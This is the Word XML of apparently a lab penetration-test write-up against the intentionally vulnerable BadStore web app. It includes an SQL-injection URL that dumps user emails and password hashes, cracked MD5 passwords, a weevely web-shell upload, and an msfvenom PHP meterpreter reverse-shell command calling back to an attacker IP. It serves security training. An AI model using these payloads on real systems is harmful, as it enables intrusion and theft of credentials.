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B6636" w14:textId="77777777" w:rsidR="007C3255" w:rsidRPr="00D5155D" w:rsidRDefault="00555690">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exploits Phase Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680CD5DE" w14:textId="77777777" w:rsidR="00555690" w:rsidRPr="00D5155D" w:rsidRDefault="00555690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Initially check IP is still the same etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F75A4F3" w14:textId="77777777" w:rsidR="00555690" w:rsidRPr="00D5155D" w:rsidRDefault="00555690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Pings ok, IP still: 192.168.16.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F45EF6B" w14:textId="77777777" w:rsidR="00555690" w:rsidRPr="00D5155D" w:rsidRDefault="00555690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Navigated to: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FEC059" w14:textId="77777777" w:rsidR="00555690" w:rsidRPr="00D5155D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00555690" w:rsidRPr="00D5155D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          </w:rPr>
          <w:t>http://192.168.16.128</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10260681" w14:textId="77777777" w:rsidR="00555690" w:rsidRPr="00D5155D" w:rsidRDefault="00555690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And attempted a login using SQL injection command which gave me the Master System Administrator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4331F" w14:textId="5D90D57A" w:rsidR="00555690" w:rsidRPr="00D5155D" w:rsidRDefault="00555690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0B9DED6" wp14:editId="25A6A8E3">
            <wp:extent cx="2886074" cy="201930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5"/>
                    <a:srcRect l="19463" t="22506" r="52613" b="16577"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2891974" cy="2023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A9080" w14:textId="05DDA954" w:rsidR="000F07D3" w:rsidRPr="00D5155D" w:rsidRDefault="000F07D3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I checked the robots.txt file out as the reconnaissance phase suggested in divulged information it shouldn’t. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B5ADB8" w14:textId="4C18EF55" w:rsidR="000F07D3" w:rsidRPr="00D5155D" w:rsidRDefault="00FB0F4C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48BBD62E" wp14:editId="24E6FA31">
            <wp:extent cx="3467100" cy="187709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443" t="21763" r="54466" b="34196"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3481692" cy="188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7F4B" w14:textId="5EB6A51F" w:rsidR="00FB0F4C" w:rsidRPr="00D5155D" w:rsidRDefault="00FB0F4C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The next step is to attempt known exploits through the discovered vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0144B64D" w14:textId="77777777" w:rsidR="002100A1" w:rsidRPr="00D5155D" w:rsidRDefault="002100A1" w:rsidP="002100A1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Checked apache exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44125874" w14:textId="77777777" w:rsidR="002100A1" w:rsidRPr="00D5155D" w:rsidRDefault="002100A1" w:rsidP="002100A1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$ searchsploit apache 1.3.28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED821A0" w14:textId="77777777" w:rsidR="002100A1" w:rsidRPr="00D5155D" w:rsidRDefault="002100A1" w:rsidP="002100A1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148EC102" wp14:editId="438F20F3">
            <wp:extent cx="5638800" cy="1783702"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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t="32124" r="51141" b="19689"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5653534" cy="178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9787F" w14:textId="2F942E62" w:rsidR="00FB0F4C" w:rsidRPr="00D5155D" w:rsidRDefault="00FF7656">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I read through some of the web application and discovered that a supplier has an upload option, this opens up ECE to multiple vulnerabilities and an attacker could upload malicious code should they</w:t>
      </w:r>
      <w:r w:rsidR="00D21E89" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve"> wish to. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C41FF8" w14:textId="65E0DF45" w:rsidR="00D21E89" w:rsidRPr="00D5155D" w:rsidRDefault="00D21E89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EE25911" wp14:editId="1E03AFE3">
            <wp:extent cx="3867150" cy="2408286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19776" t="22798" r="52471" b="23316"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3877955" cy="241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132CA" w14:textId="712668F6" w:rsidR="00D21E89" w:rsidRPr="00D5155D" w:rsidRDefault="00D21E89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Remediation: Change this function to be a </w:t>
      </w:r>
      <w:r w:rsidR="00B54F09" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t>form that properly sanitises user input prior to storing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69958799" w14:textId="72D4DAF7" w:rsidR="00B54F09" w:rsidRPr="00D5155D" w:rsidRDefault="00B54F09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Tried the following sql command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE121ED" w14:textId="1515F207" w:rsidR="00B54F09" w:rsidRPr="00D5155D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="0007776A" w:rsidRPr="00D5155D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Courier New"/>
            <w:spacing w:val="-5"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:rPr>
          <w:t>http://192.168.16.128/cgi-bin/badstore.cgi?searchquery=xx'+IN+(itemnum,sdesc,ldesc)+union+select+email,passwd,123,123+from+userdb+LIMIT+2+--+&amp;action=search&amp;x=16&amp;y=7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05F2A5AD" w14:textId="78997E64" w:rsidR="0007776A" w:rsidRPr="00D5155D" w:rsidRDefault="0007776A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B70C9C1" wp14:editId="3A50DA59">
            <wp:extent cx="4901900" cy="3170251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7146" t="21762" r="62276" b="16580"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4901900" cy="317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C022" w14:textId="14EF71C4" w:rsidR="00133013" w:rsidRPr="00D5155D" w:rsidRDefault="00133013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It shows the accounts ‘admin’ </w:t>
      </w:r>
      <w:r w:rsidR="003B0AFE" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FACF54F" w14:textId="40EC375B" w:rsidR="003B0AFE" w:rsidRPr="00D5155D" w:rsidRDefault="003B0AFE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5EBE2294ECD0E0F08EAB7690D2A6EE69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41147F04" w14:textId="4A5997F1" w:rsidR="003B0AFE" w:rsidRPr="00D5155D" w:rsidRDefault="003B0AFE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and ‘AAA_Test_User’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A4EF3E" w14:textId="6A26CA12" w:rsidR="003B0AFE" w:rsidRPr="00D5155D" w:rsidRDefault="003B0AFE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098F6BCD4621D373CADE4E832627B4F6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D23065A" w14:textId="10509835" w:rsidR="003B0AFE" w:rsidRPr="00D5155D" w:rsidRDefault="003B0AFE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As we know what cryptographic systems and protocols </w:t>
      </w:r>
      <w:r w:rsidR="00637AC4" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t>badstore.net uses, we are able to decrypt this quite easily:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEBDFA6" w14:textId="7D05B01F" w:rsidR="00552677" w:rsidRPr="00D5155D" w:rsidRDefault="00552677">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidR="003C3B3D" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve">a few </w:t>
      </w:r>
      <w:r w:rsidR="00AB797C" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve">decryption </w:t>
      </w:r>
      <w:r w:rsidR="003C3B3D" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve">websites, I quickly discovered the </w:t>
      </w:r>
      <w:r w:rsidR="004A0057" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve">admin </w:t>
      </w:r>
      <w:r w:rsidR="003C3B3D" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t>password to be ‘secret’</w:t>
      </w:r>
      <w:r w:rsidR="004A0057" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the test password </w:t>
      </w:r>
      <w:r w:rsidR="00A9335A" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t>to be ‘test’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B03BC1" w14:textId="10567B32" w:rsidR="00680ABD" w:rsidRPr="00D5155D" w:rsidRDefault="003204C4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can login as the Master System Administrator</w:t>
      </w:r>
      <w:r w:rsidR="001E6317" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve"> with credentials as opposed to using SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0E07D" w14:textId="628A59FE" w:rsidR="001E6317" w:rsidRPr="00D5155D" w:rsidRDefault="001E6317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navigate to well know areas within a web application and ‘admin’ is the first port of call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC6D05E" w14:textId="3D16F417" w:rsidR="0090153C" w:rsidRPr="00D5155D" w:rsidRDefault="0090153C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02103366" wp14:editId="031FC60E">
            <wp:extent cx="4362450" cy="2789107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7313" t="23834" r="62275" b="15544"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4367837" cy="279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FC8F" w14:textId="2F14BB45" w:rsidR="008F4177" w:rsidRPr="00D5155D" w:rsidRDefault="008F4177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can view a full list of users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49611EA2" w14:textId="0AEEDC6B" w:rsidR="008F4177" w:rsidRPr="00D5155D" w:rsidRDefault="008F4177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561F6FA1" wp14:editId="37EC9A79">
            <wp:extent cx="3876675" cy="3012448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9473" t="22280" r="64436" b="14508"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3884202" cy="3018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A9ACA" w14:textId="2A576BBA" w:rsidR="008F4177" w:rsidRPr="00D5155D" w:rsidRDefault="00CD432A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I noticed an option for backing up the databases and wondered if this would give away any information, it gave me the file I would need to navigate to to find the databases, </w:t>
      </w:r>
      <w:r w:rsidR="002D09BE" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t>I can access the database backups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CC9556" w14:textId="0DC83927" w:rsidR="00C52AF5" w:rsidRPr="00D5155D" w:rsidRDefault="00C52AF5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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="554539C0" wp14:editId="4350996E">
            <wp:extent cx="4029075" cy="1533525"/>
            <wp:effectExtent l="0" t="0" r="9525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9506" t="36075" r="64406" b="32968"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4052136" cy="154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17420" w14:textId="061ADA52" w:rsidR="002D09BE" w:rsidRPr="00D5155D" w:rsidRDefault="002D09BE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6E6D37B" wp14:editId="4B81C9C0">
            <wp:extent cx="4124325" cy="2062163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9638" t="21762" r="64769" b="38342"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4131322" cy="206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F5D2" w14:textId="77777777" w:rsidR="006B6F83" w:rsidRPr="00D5155D" w:rsidRDefault="00572F25" w:rsidP="006F7828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navigated further to the troubleshooting section and it gave away a lot of sensitive information</w:t>
      </w:r>
      <w:r w:rsidR="00B9132E" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve"> as well a recent Apache error log</w:t>
      </w:r>
      <w:r w:rsidR="00B326A3" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve">, I now also know </w:t>
      </w:r>
      <w:r w:rsidR="006F7828" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve">the server software being used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F362898" w14:textId="26D6BB33" w:rsidR="00C52AF5" w:rsidRPr="00D5155D" w:rsidRDefault="006F7828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SERVER_SOFTWARE </w:t>
      </w:r>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">the server software </w:t>
      </w:r>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Apache/1.3.28 (Unix) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t>mod_ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t>/2.8.15 OpenSSL/0.9.7c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D5DB32" w14:textId="0E2F2C1A" w:rsidR="00572F25" w:rsidRPr="00D5155D" w:rsidRDefault="00636E69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C37B435" wp14:editId="0125475B">
            <wp:extent cx="4705350" cy="198760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166" t="35751" r="61279" b="13472"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4720781" cy="199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BA435" w14:textId="6B4D4041" w:rsidR="00636E69" w:rsidRPr="00D5155D" w:rsidRDefault="00756D54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Another note to make is that the </w:t>
      </w:r>
      <w:r w:rsidR="00F21EF6" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t>quick search</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve"> bar when used will show the web applications database name</w:t>
      </w:r>
      <w:r w:rsidR="00F21EF6" w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the shop items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA6ECBC" w14:textId="595F3391" w:rsidR="00F21EF6" w:rsidRPr="00D5155D" w:rsidRDefault="00F21EF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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75B22521" wp14:editId="17775E09">
            <wp:extent cx="4448175" cy="1922051"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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332" t="35233" r="72745" b="28497"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4460477" cy="192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0C430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After doing some research on creating a back door via the web application upload feature I noticed earlier, I have opted to use weevely to create a bash file so I can upload it to the badstore.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE32D71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5DD79B43" wp14:editId="336C47B6">
            <wp:extent cx="4264615" cy="933450"/>
            <wp:effectExtent l="0" t="0" r="3175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l="7477" t="66839" r="75652" b="21648"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4290401" cy="93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373E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Now I need to login to a supplier account to be able to upload my bash script, I select ‘Debbie’ from the user lists:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B34A5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5C07D9F2" wp14:editId="34410809">
            <wp:extent cx="6315502" cy="171450"/>
            <wp:effectExtent l="0" t="0" r="952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l="5437" t="57853" r="73078" b="40329"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6339670" cy="17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F5FBA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As we now know that MD5 is being used, I decrypt Debbie’s pw online:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02284ED9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3DDE030F" wp14:editId="09281C5C">
            <wp:extent cx="3647525" cy="260032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54841" t="10362" r="18237" b="29799"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3654700" cy="260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57A00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We can see that Debbie’s password is ‘helpme’, I login with her credentials (</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00D5155D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          </w:rPr>
          <w:t>debbie@supplier.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5306416B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62D4BAF4" wp14:editId="16151210">
            <wp:extent cx="1818986" cy="111125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4819" t="36946" r="72414" b="19689"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1834710" cy="112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89A89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need to ensure I upload and save in the correct file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D4C7E" w14:textId="77777777" w:rsidR="002D3C46" w:rsidRPr="00D5155D" w:rsidRDefault="002D3C46" w:rsidP="002D3C46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00D5155D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          </w:rPr>
          <w:t>http://192.168.16.128/cgi-bin/shell.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="720C45A0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4162A71C" wp14:editId="00B1B8F7">
            <wp:extent cx="3008849" cy="1438275"/>
            <wp:effectExtent l="0" t="0" r="127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5152" t="41969" r="72745" b="25090"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3023119" cy="144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812BE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Got it wrong the first time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B53FA8A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3D117C66" wp14:editId="62DE3663">
            <wp:extent cx="3552190" cy="1257175"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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l="5318" t="47723" r="76069" b="31739"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3562214" cy="1260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28BF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Now in kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538AEC18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$ weevely </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00D5155D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          </w:rPr>
          <w:t>http://192.168.16.128/cgi-bin/shell.php pass12345</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13904437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01D95766" wp14:editId="09FA98F5">
            <wp:extent cx="2800350" cy="158432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2493" t="54404" r="80470" b="15544"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2813584" cy="159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B040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cannot navigate the back door:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2997388E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6DCAAB9F" wp14:editId="1326E193">
            <wp:extent cx="4467225" cy="1813428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2659" t="62694" r="80556" b="16062"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4487440" cy="1821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166FF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will try out msfvenom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B8FC16" w14:textId="77777777" w:rsidR="002D3C46" w:rsidRPr="00D5155D" w:rsidRDefault="002D3C46" w:rsidP="002D3C46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>$ msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.71.131 lport=4444 -f raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB9B5B" w14:textId="77777777" w:rsidR="002D3C46" w:rsidRPr="00D5155D" w:rsidRDefault="002D3C46" w:rsidP="002D3C46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55A88178" wp14:editId="3C7BB3DB">
            <wp:extent cx="3798722" cy="247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" t="34197" r="77946" b="21244"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3810431" cy="248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B0D9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>I have saved the file and will upload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5456E9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70AFBB89" wp14:editId="20BA74F3">
            <wp:extent cx="3552825" cy="1965325"/>
            <wp:effectExtent l="0" t="0" r="9525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14642" t="32945" r="62510" b="27650"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3561587" cy="19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1FEE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</w:rPr>
        <w:t xml:space="preserve">I will utilise msfconsole here, according to experience and sources, it is good to have a handler listening out for the connection, you can see the commands used in the screen grab: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B0CDE6" w14:textId="77777777" w:rsidR="002D3C46" w:rsidRPr="00D5155D" w:rsidRDefault="002D3C46" w:rsidP="002D3C46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5155D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C25639F" wp14:editId="316BA055">
            <wp:extent cx="2962275" cy="2565750"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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30"/>
                    <a:srcRect l="10470" t="29016" r="68424" b="13990"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2967716" cy="257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DC974" w14:textId="77777777" w:rsidR="006748B7" w:rsidRPr="00D5155D" w:rsidRDefault="006748B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006748B7" w:rsidRPr="00D515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690"/>
    <w:rsid w:val="00074105"/>
    <w:rsid w:val="0007776A"/>
    <w:rsid w:val="000A54B9"/>
    <w:rsid w:val="000D4AD5"/>
    <w:rsid w:val="000F07D3"/>
    <w:rsid w:val="00123E95"/>
    <w:rsid w:val="001248F3"/>
    <w:rsid w:val="00133013"/>
    <w:rsid w:val="001772FC"/>
    <w:rsid w:val="001E6317"/>
    <w:rsid w:val="002100A1"/>
    <w:rsid w:val="00291F8C"/>
    <w:rsid w:val="00292B03"/>
    <w:rsid w:val="002B3166"/>
    <w:rsid w:val="002D09BE"/>
    <w:rsid w:val="002D3C46"/>
    <w:rsid w:val="003204C4"/>
    <w:rsid w:val="003B0AFE"/>
    <w:rsid w:val="003C3B3D"/>
    <w:rsid w:val="00413FAE"/>
    <w:rsid w:val="00427ACC"/>
    <w:rsid w:val="0044325F"/>
    <w:rsid w:val="0047767E"/>
    <w:rsid w:val="004857A6"/>
    <w:rsid w:val="004A0057"/>
    <w:rsid w:val="00552677"/>
    <w:rsid w:val="00555690"/>
    <w:rsid w:val="00572F25"/>
    <w:rsid w:val="005B7F2B"/>
